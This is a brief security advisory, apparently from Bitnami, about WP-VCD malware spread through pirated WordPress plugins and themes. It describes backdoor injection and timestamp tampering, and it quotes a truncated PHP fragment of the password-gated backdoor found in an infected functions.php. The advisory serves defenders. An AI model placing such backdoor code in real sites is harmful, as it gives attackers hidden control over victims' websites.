oracle

2019-11-08 WordPress WP-VCD Malware via Pirated Plugins or Themes

We recently received several support requests about WordPress sites that went down without any apparent reason. After investigating these issues, we found that there is an ongoing attack known as WP-VCD. This infection is spread via “nulled”, or pirated, plugins and themes distributed by a network of related sites.

The Bitnami Team can confirm that none of these plugins are included in Bitnami solutions by default. So long as you did not install a “nulled” plugin or theme, your WordPress deployment is secure against this vulnerability.

Once users install an infected theme or plugin downloaded from these distribution sites, their WordPress installations are hacked and taken over within seconds. The malware will execute a deployer script that injects a backdoor within all installed theme files, and resets the timestamps to match the values before the injection process to evade detection. The code snippet below was sourced from an infected “functions.php” file on a site compromised by WP-VCD.

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474'))
    {
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))

You can find more information about this attack on the Wordfence site and in other security announcements like this one. Wordfence also provides a site cleaning guide for owners of infected sites and a detailed procedure for how to secure WordPress websites to prevent future attacks.

If you have further questions about Bitnami WordPress or this security issue, please post to our community forum and we will be happy to help you.

Last modification November 8, 2019